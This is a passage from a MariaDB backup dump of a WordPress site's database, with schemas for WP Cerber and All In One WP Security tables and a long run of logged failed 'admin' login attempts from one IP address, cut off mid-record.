File: //restore/20230201.dogstardesigncouk.sql
-- MariaDB dump 10.19 Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: dogstardesigncouk
-- ------------------------------------------------------
-- Server version 10.5.18-MariaDB-1:10.5.18+maria~ubu2004
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `dogstardesigncouk`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `dogstardesigncouk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;
USE `dogstardesigncouk`;
--
-- Table structure for table `cerber_acl`
--
DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
`ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
`ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
`tag` char(1) NOT NULL,
`comments` varchar(250) NOT NULL,
`acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
`ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
`v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_acl`
--
LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_blocks`
--
DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`block_until` bigint(20) unsigned NOT NULL,
`reason` varchar(250) NOT NULL,
`reason_id` int(11) unsigned NOT NULL DEFAULT 0,
UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_blocks`
--
LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_countries`
--
DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
`country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
`locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
`country_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_countries`
--
LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_lab`
--
DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`reason_id` int(11) unsigned NOT NULL DEFAULT 0,
`stamp` bigint(20) unsigned NOT NULL,
`details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_lab`
--
LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_lab_ip`
--
DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`reputation` int(11) unsigned NOT NULL,
`expires` int(11) unsigned NOT NULL,
PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_lab_ip`
--
LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_lab_net`
--
DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
`ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`expires` int(11) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`ip`),
UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_lab_net`
--
LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_log`
--
DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_login` varchar(60) NOT NULL,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`stamp` decimal(14,4) NOT NULL,
`activity` int(10) unsigned NOT NULL DEFAULT 0,
`session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
KEY `ip` (`ip`),
KEY `ip_long` (`ip_long`),
KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_log`
--
LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_qmem`
--
DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`http_code` int(10) unsigned NOT NULL,
`stamp` int(10) unsigned NOT NULL,
KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_qmem`
--
LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_traffic`
--
DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
`hostname` varchar(250) NOT NULL DEFAULT '',
`uri` text NOT NULL,
`request_fields` mediumtext NOT NULL,
`request_details` mediumtext NOT NULL,
`session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`stamp` decimal(14,4) NOT NULL,
`processing` int(10) NOT NULL DEFAULT 0,
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`http_code` int(10) unsigned NOT NULL,
`wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`wp_type` int(10) unsigned NOT NULL DEFAULT 0,
`is_bot` int(10) unsigned NOT NULL DEFAULT 0,
`blog_id` int(10) unsigned NOT NULL DEFAULT 0,
`php_errors` text NOT NULL,
`req_status` int(10) unsigned NOT NULL DEFAULT 0,
KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_traffic`
--
LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_events`
--
DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`event_type` varchar(150) NOT NULL DEFAULT '',
`username` varchar(150) DEFAULT NULL,
`user_id` bigint(20) DEFAULT NULL,
`event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`ip_or_host` varchar(100) DEFAULT NULL,
`referer_info` varchar(255) DEFAULT NULL,
`url` varchar(255) DEFAULT NULL,
`country_code` varchar(50) DEFAULT NULL,
`event_data` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_events`
--
LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_failed_logins`
--
DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=579244 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_failed_logins`
--
LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
INSERT INTO `wp_aiowps_failed_logins` VALUES (574244,0,'admin','2023-01-22 15:24:17','20.118.175.32'),(574245,0,'admin','2023-01-22 15:24:17','20.118.175.32'),(574246,0,'admin','2023-01-22 15:24:17','20.118.175.32'),(574247,0,'admin','2023-01-22 15:24:18','20.118.175.32'),(574248,0,'admin','2023-01-22 15:24:18','20.118.175.32'),(574249,0,'admin','2023-01-22 15:24:18','20.118.175.32'),(574250,0,'admin','2023-01-22 15:24:18','20.118.175.32'),(574251,0,'admin','2023-01-22 15:24:18','20.118.175.32'),(574252,0,'admin','2023-01-22 15:24:19','20.118.175.32'),(574253,0,'admin','2023-01-22 15:24:19','20.118.175.32'),(574254,0,'admin','2023-01-22 15:24:19','20.118.175.32'),(574255,0,'admin','2023-01-22 15:24:19','20.118.175.32'),(574256,0,'admin','2023-01-22 15:24:20','20.118.175.32'),(574257,0,'admin','2023-01-22 15:24:20','20.118.175.32'),(574258,0,'admin','2023-01-22 15:24:20','20.118.175.32'),(574259,0,'admin','2023-01-22 15:24:20','20.118.175.32'),(574260,0,'admin','2023-01-22 15:24:21','20.118.175.32'),(574261,0,'admin','2023-01-22 15:24:21','20.118.175.32'),(574262,0,'admin','2023-01-22 15:24:21','20.118.175.32'),(574263,0,'admin','2023-01-22 15:24:21','20.118.175.32'),(574264,0,'admin','2023-01-22 15:24:22','20.118.175.32'),(574265,0,'admin','2023-01-22 15:24:22','20.118.175.32'),(574266,0,'admin','2023-01-22 15:24:22','20.118.175.32'),(574267,0,'admin','2023-01-22 15:24:22','20.118.175.32'),(574268,0,'admin','2023-01-22 15:24:23','20.118.175.32'),(574269,0,'admin','2023-01-22 15:24:23','20.118.175.32'),(574270,0,'admin','2023-01-22 15:24:23','20.118.175.32'),(574271,0,'admin','2023-01-22 15:24:23','20.118.175.32'),(574272,0,'admin','2023-01-22 15:24:24','20.118.175.32'),(574273,0,'admin','2023-01-22 15:24:24','20.118.175.32'),(574274,0,'admin','2023-01-22 15:24:24','20.118.175.32'),(574275,0,'admin','2023-01-22 15:24:24','20.118.175.32'),(574276,0,'admin','2023-01-22 15:24:25','20.118.175.32'),(574277,0,'admin','2023-01-22 15:24:25','20.118.175.32'),(574278,0,'admin','2023-01-22 15:24:25','20.118.175.32'),(574279,0,'admin','2023-01-22 15:24:25','20.118.175.32'),(574280,0,'admin','2023-01-22 15:24:26','20.118.175.32'),(574281,0,'admin','2023-01-22 15:24:26','20.118.175.32'),(574282,0,'admin','2023-01-22 15:24:26','20.118.175.32'),(574283,0,'admin','2023-01-22 15:24:27','20.118.175.32'),(574284,0,'admin','2023-01-22 15:24:27','20.118.175.32'),(574285,0,'admin','2023-01-22 15:24:27','20.118.175.32'),(574286,0,'admin','2023-01-22 15:24:27','20.118.175.32'),(574287,0,'admin','2023-01-22 15:24:28','20.118.175.32'),(574288,0,'admin','2023-01-22 15:24:28','20.118.175.32'),(574289,0,'admin','2023-01-22 15:24:28','20.118.175.32'),(574290,0,'admin','2023-01-22 15:24:29','20.118.175.32'),(574291,0,'admin','2023-01-22 15:24:29','20.118.175.32'),(574292,0,'admin','2023-01-22 15:24:29','20.118.175.32'),(574293,0,'admin','2023-01-22 15:24:29','20.118.175.32'),(574294,0,'admin','2023-01-22 15:24:30','20.118.175.32'),(574295,0,'admin','2023-01-22 15:24:30','20.118.175.32'),(574296,0,'admin','2023-01-22 15:24:30','20.118.175.32'),(574297,0,'admin','2023-01-22 15:24:30','20.118.175.32'),(574298,0,'admin','2023-01-22 15:24:31','20.118.175.32'),(574299,0,'admin','2023-01-22 15:24:31','20.118.175.32'),(574300,0,'admin','2023-01-22 15:24:31','20.118.175.32'),(574301,0,'admin','2023-01-22 15:24:31','20.118.175.32'),(574302,0,'admin','2023-01-22 15:24:31','20.118.175.32'),(574303,0,'admin','2023-01-22 15:24:32','20.118.175.32'),(574304,0,'admin','2023-01-22 15:24:32','20.118.175.32'),(574305,0,'admin','2023-01-22 15:24:32','20.118.175.32'),(574306,0,'admin','2023-01-22 15:24:32','20.118.175.32'),(574307,0,'admin','2023-01-22 15:24:33','20.118.175.32'),(574308,0,'admin','2023-01-22 15:24:33','20.118.175.32'),(574309,0,'admin','2023-01-22 15:24:33','20.118.175.32'),(574310,0,'admin','2023-01-22 15:24:33','20.118.175.32'),(574311,0,'admin','2023-01-22 15:24:34','20.118.175.32'),(574312,0,'admin','2023-01-22 15:24:34','20.118.175.32'),(574313,0,'admin','2023-01-22 15:24:34','20.118.175.32'),(574314,0,'admin','2023-01-22 15:24:34','20.118.175.32'),(574315,0,'admin','2023-01-22 15:24:35','20.118.175.32'),(574316,0,'admin','2023-01-22 15:24:35','20.118.175.32'),(574317,0,'admin','2023-01-22 15:24:35','20.118.175.32'),(574318,0,'admin','2023-01-22 15:24:35','20.118.175.32'),(574319,0,'admin','2023-01-22 15:24:36','20.118.175.32'),(574320,0,'admin','2023-01-22 15:24:36','20.118.175.32'),(574321,0,'admin','2023-01-22 15:24:36','20.118.175.32'),(574322,0,'admin','2023-01-22 15:24:36','20.118.175.32'),(574323,0,'admin','2023-01-22 15:24:37','20.118.175.32'),(574324,0,'admin','2023-01-22 15:24:37','20.118.175.32'),(574325,0,'admin','2023-01-22 15:24:37','20.118.175.32'),(574326,0,'admin','2023-01-22 15:24:37','20.118.175.32'),(574327,0,'admin','2023-01-22 15:24:38','20.118.175.32'),(574328,0,'admin','2023-01-22 15:24:38','20.118.175.32'),(574329,0,'admin','2023-01-22 15:24:38','20.118.175.32'),(574330,0,'admin','2023-01-22 15:24:38','20.118.175.32'),(574331,0,'admin','2023-01-22 15:24:39','20.118.175.32'),(574332,0,'admin','2023-01-22 15:24:39','20.118.175.32'),(574333,0,'admin','2023-01-22 15:24:39','20.118.175.32'),(574334,0,'admin','2023-01-22 15:24:39','20.118.175.32'),(574335,0,'admin','2023-01-22 15:24:40','20.118.175.32'),(574336,0,'admin','2023-01-22 15:24:40','20.118.175.32'),(574337,0,'admin','2023-01-22 15:24:40','20.118.175.32'),(574338,0,'admin','2023-01-22 15:24:40','20.118.175.32'),(574339,0,'admin','2023-01-22 15:24:41','20.118.175.32'),(574340,0,'admin','2023-01-22 15:24:41','20.118.175.32'),(574341,0,'admin','2023-01-22 15:24:41','20.118.175.32'),(574342,0,'admin','2023-01-22 15:24:41','20.118.175.32'),(574343,0,'admin','2023-01-22 15:24:42','20.118.175.32'),(574344,0,'admin','2023-01-22 15:24:42','20.118.175.32'),(574345,0,'admin','2023-01-22 15:24:42','20.118.175.32'),(574346,0,'admin','2023-01-22 15:24:42','20.118.175.32'),(574347,0,'admin','2023-01-22 15:24:43','20.118.175.32'),(574348,0,'admin','2023-01-22 15:24:43','20.118.175.32'),(574349,0,'admin','2023-01-22 15:24:43','20.118.175.32'),(574350,0,'admin','2023-01-22 15:24:43','20.118.175.32'),(574351,0,'admin','2023-01-22 15:24:44','20.118.175.32'),(574352,0,'admin','2023-01-22 15:24:44','20.118.175.32'),(574353,0,'admin','2023-01-22 15:24:44','20.118.175.32'),(574354,0,'admin','2023-01-22 15:24:44','20.118.175.32'),(574355,0,'admin','2023-01-22 15:24:45','20.118.175.32'),(574356,0,'admin','2023-01-22 15:24:45','20.118.175.32'),(574357,0,'admin','2023-01-22 15:24:45','20.118.175.32'),(574358,0,'admin','2023-01-22 15:24:45','20.118.175.32'),(574359,0,'admin','2023-01-22 15:24:46','20.118.175.32'),(574360,0,'admin','2023-01-22 15:24:46','20.118.175.32'),(574361,0,'admin','2023-01-22 15:24:46','20.118.175.32'),(574362,0,'admin','2023-01-22 15:24:46','20.118.175.32'),(574363,0,'admin','2023-01-22 15:24:47','20.118.175.32'),(574364,0,'admin','2023-01-22 15:24:47','20.118.175.32'),(574365,0,'admin','2023-01-22 15:24:47','20.118.175.32'),(574366,0,'admin','2023-01-22 15:24:48','20.118.175.32'),(574367,0,'admin','2023-01-22 15:24:48','20.118.175.32'),(574368,0,'admin','2023-01-22 15:24:49','20.118.175.32'),(574369,0,'admin','2023-01-22 15:24:49','20.118.175.32'),(574370,0,'admin','2023-01-22 15:24:49','20.118.175.32'),(574371,0,'admin','2023-01-22 15:24:49','20.118.175.32'),(574372,0,'admin','2023-01-22 15:24:50','20.118.175.32'),(574373,0,'admin','2023-01-22 15:24:50','20.118.175.32'),(574374,0,'admin','2023-01-22 15:24:50','20.118.175.32'),(574375,0,'admin','2023-01-22 15:24:50','20.118.175.32'),(574376,0,'admin','2023-01-22 15:24:51','20.118.175.32'),(574377,0,'admin','2023-01-22 15:24:51','20.118.175.32'),(574378,0,'admin','2023-01-22 15:24:51','20.118.175.32'),(574379,0,'admin','2023-01-22 15:24:51','20.118.175.32'),(574380,0,'admin','2023-01-22 15:24:52','20.118.175.32'),(574381,0,'admin','2023-01-22 15:24:52','20.118.175.32'),(574382,0,'admin','2023-01-22 15:24:52','20.118.175.32'),(574383,0,'admin','2023-01-22 15:24:52','20.118.175.32'),(574384,0,'admin','2023-01-22 15:24:52','20.118.175.32'),(574385,0,'admin','2023-01-22 15:24:53','20.118.175.32'),(574386,0,'admin','2023-01-22 15:24:53','20.118.175.32'),(574387,0,'admin','2023-01-22 15:24:53','20.118.175.32'),(574388,0,'admin','2023-01-22 15:24:53','20.118.175.32'),(574389,0,'admin','2023-01-22 15:24:54','20.118.175.32'),(574390,0,'admin','2023-01-22 15:24:54','20.118.175.32'),(574391,0,'admin','2023-01-22 15:24:55','20.118.175.32'),(574392,0,'admin','2023-01-22 15:24:55','20.118.175.32'),(574393,0,'admin','2023-01-22 15:24:55','20.118.175.32'),(574394,0,'admin','2023-01-22 15:24:55','20.118.175.32'),(574395,0,'admin','2023-01-22 15:24:56','20.118.175.32'),(574396,0,'admin','2023-01-22 15:24:56','20.118.175.32'),(574397,0,'admin','2023-01-22 15:24:56','20.118.175.32'),(574398,0,'admin','2023-01-22 15:24:56','20.118.175.32'),(574399,0,'admin','2023-01-22 15:24:57','20.118.175.32'),(574400,0,'admin','2023-01-22 15:24:57','20.118.175.32'),(574401,0,'admin','2023-01-22 15:24:57','20.118.175.32'),(574402,0,'admin','2023-01-22 15:24:57','20.118.175.32'),(574403,0,'admin','2023-01-22 15:24:58','20.118.175.32'),(574404,0,'admin','2023-01-22 15:24:58','20.118.175.32'),(574405,0,'admin','2023-01-22 15:24:58','20.118.175.32'),(574406,0,'admin','2023-01-22 15:24:58','20.118.175.32'),(574407,0,'admin','2023-01-22 15:24:59','20.118.175.32'),(574408,0,'admin','2023-01-22 15:24:59','20.118.175.32'),(574409,0,'admin','2023-01-22 15:24:59','20.118.175.32'),(574410,0,'admin','2023-01-22 15:24:59','20.118.175.32'),(574411,0,'admin','2023-01-22 15:25:00','20.118.175.32'),(574412,0,'admin','2023-01-22 15:25:00','20.118.175.32'),(574413,0,'admin','2023-01-22 15:25:00','20.118.175.32'),(574414,0,'admin','2023-01-22 15:25:00','20.118.175.32'),(574415,0,'admin','2023-01-22 15:25:01','20.118.175.32'),(574416,0,'admin','2023-01-22 15:25:01','20.118.175.32'),(574417,0,'admin','2023-01-22 15:25:01','20.118.175.32'),(574418,0,'admin','2023-01-22 15:25:01','20.118.175.32'),(574419,0,'admin','2023-01-22 15:25:02','20.118.175.32'),(574420,0,'admin','2023-01-22 15:25:02','20.118.175.32'),(574421,0,'admin','2023-01-22 15:25:02','20.118.175.32'),(574422,0,'admin','2023-01-22 15:25:02','20.118.175.32'),(574423,0,'admin','2023-01-22 15:25:03','20.118.175.32'),(574424,0,'admin','2023-01-22 15:25:03','20.118.175.32'),(574425,0,'admin','2023-01-22 15:25:03','20.118.175.32'),(574426,0,'admin','2023-01-22 15:25:03','20.118.175.32'),(574427,0,'admin','2023-01-22 15:25:04','20.118.175.32'),(574428,0,'admin','2023-01-22 15:25:04','20.118.175.32'),(574429,0,'admin','2023-01-22 15:25:04','20.118.175.32'),(574430,0,'admin','2023-01-22 15:25:04','20.118.175.32'),(574431,0,'admin','2023-01-22 15:25:05','20.118.175.32'),(574432,0,'admin','2023-01-22 15:25:05','20.118.175.32'),(574433,0,'admin','2023-01-22 15:25:05','20.118.175.32'),(574434,0,'admin','2023-01-22 15:25:05','20.118.175.32'),(574435,0,'admin','2023-01-22 15:25:06','20.118.175.32'),(574436,0,'admin','2023-01-22 15:25:06','20.118.175.32'),(574437,0,'admin','2023-01-22 15:25:06','20.118.175.32'),(574438,0,'admin','2023-01-22 15:25:06','20.118.175.32'),(574439,0,'admin','2023-01-22 15:25:07','20.118.175.32'),(574440,0,'admin','2023-01-22 15:25:07','20.118.175.32'),(574441,0,'admin','2023-01-22 15:25:07','20.118.175.32'),(574442,0,'admin','2023-01-22 15:25:08','20.118.175.32'),(574443,0,'admin','2023-01-22 15:25:08','20.118.175.32'),(574444,0,'admin','2023-01-22 15:25:08','20.118.175.32'),(574445,0,'admin','2023-01-22 15:25:08','20.118.175.32'),(574446,0,'admin','2023-01-22 15:25:09','20.118.175.32'),(574447,0,'admin','2023-01-22 15:25:09','20.118.175.32'),(574448,0,'admin','2023-01-22 15:25:09','20.118.175.32'),(574449,0,'admin','2023-01-22 15:25:09','20.118.175.32'),(574450,0,'admin','2023-01-22 15:25:10','20.118.175.32'),(574451,0,'admin','2023-01-22 15:25:10','20.118.175.32'),(574452,0,'admin','2023-01-22 15:25:10','20.118.175.32'),(574453,0,'admin','2023-01-22 15:25:10','20.118.175.32'),(574454,0,'admin','2023-01-22 15:25:11','20.118.175.32'),(574455,0,'admin','2023-01-22 15:25:11','20.118.175.32'),(574456,0,'admin','2023-01-22 15:25:11','20.118.175.32'),(574457,0,'admin','2023-01-22 15:25:11','20.118.175.32'),(574458,0,'admin','2023-01-22 15:25:12','20.118.175.32'),(574459,0,'admin','2023-01-22 15:25:12','20.118.175.32'),(574460,0,'admin','2023-01-22 15:25:12','20.118.175.32'),(574461,0,'admin','2023-01-22 15:25:12','20.118.175.32'),(574462,0,'admin','2023-01-22 15:25:13','20.118.175.32'),(574463,0,'admin','2023-01-22 15:25:13','20.118.175.32'),(574464,0,'admin','2023-01-22 15:25:13','20.118.175.32'),(574465,0,'admin','2023-01-22 15:25:13','20.118.175.32'),(574466,0,'admin','2023-01-22 15:25:14','20.118.175.32'),(574467,0,'admin','2023-01-22 15:25:14','20.118.175.32'),(574468,0,'admin','2023-01-22 15:25:14','20.118.175.32'),(574469,0,'admin','2023-01-22 15:25:14','20.118.175.32'),(574470,0,'admin','2023-01-22 15:25:15','20.118.175.32'),(574471,0,'admin','2023-01-22 15:25:15','20.118.175.32'),(574472,0,'admin','2023-01-22 15:25:15','20.118.175.32'),(574473,0,'admin','2023-01-22 15:25:15','20.118.175.32'),(574474,0,'admin','2023-01-22 15:25:16','20.118.175.32'),(574475,0,'admin','2023-01-22 15:25:16','20.118.175.32'),(574476,0,'admin','2023-01-22 15:25:16','20.118.175.32'),(574477,0,'admin','2023-01-22 15:25:16','20.118.175.32'),(574478,0,'admin','2023-01-22 15:25:16','20.118.175.32'),(574479,0,'admin','2023-01-22 15:25:17','20.118.175.32'),(574480,0,'admin','2023-01-22 15:25:17','20.118.175.32'),(574481,0,'admin','2023-01-22 15:25:17','20.118.175.32'),(574482,0,'admin','2023-01-22 15:25:17','20.118.175.32'),(574483,0,'admin','2023-01-22 15:25:18','20.118.175.32'),(574484,0,'admin','2023-01-22 15:25:18','20.118.175.32'),(574485,0,'admin','2023-01-22 15:25:18','20.118.175.32'),(574486,0,'admin','2023-01-22 15:25:19','20.118.175.32'),(574487,0,'admin','2023-01-22 15:25:19','20.118.175.32'),(574488,0,'admin','2023-01-22 15:25:19','20.118.175.32'),(574489,0,'admin','2023-01-22 15:25:19','20.118.175.32'),(574490,0,'admin','2023-01-22 15:25:20','20.118.175.32'),(574491,0,'admin','2023-01-22 15:25:20','20.118.175.32'),(574492,0,'admin','2023-01-22 15:25:21','20.118.175.32'),(574493,0,'admin','2023-01-22 15:25:21','20.118.175.32'),(574494,0,'admin','2023-01-22 15:25:21','20.118.175.32'),(574495,0,'admin','2023-01-22 15:25:21','20.118.175.32'),(574496,0,'admin','2023-01-22 15:25:22','20.118.175.32'),(574497,0,'admin','2023-01-22 15:25:22','20.118.175.32'),(574498,0,'admin','2023-01-22 15:25:22','20.118.175.32'),(574499,0,'admin','2023-01-22 15:25:23','20.118.175.32'),(574500,0,'admin','2023-01-22 15:25:23','20.118.175.32'),(574501,0,'admin','2023-01-22 15:25:23','20.118.175.32'),(574502,0,'admin','2023-01-22 15:25:23','20.118.175.32'),(574503,0,'admin','2023-01-22 